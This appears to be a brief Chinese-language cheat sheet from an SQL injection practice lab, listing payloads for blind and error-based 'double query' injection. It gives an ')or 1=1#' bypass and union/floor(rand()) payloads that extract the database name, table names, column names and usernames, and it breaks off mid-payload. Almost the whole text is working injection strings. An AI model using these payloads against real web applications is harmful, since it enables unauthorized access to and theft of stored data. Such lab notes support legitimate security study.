可以用盲注和双注
')or 1=1#
')union select count(*),concat((select database()),floor(rand()*2)) as a from information_schema.columns group by 2# //爆库
')union select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand()*2)) as a from information_schema.columns group by 2# //爆表
')union select count(*),concat((select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand()*2)) as a from information_schema.columns group by 2# //爆字段
')union select count(*),concat((select username from security.users limit 0,1),floor(rand()*2)) as a from information_sch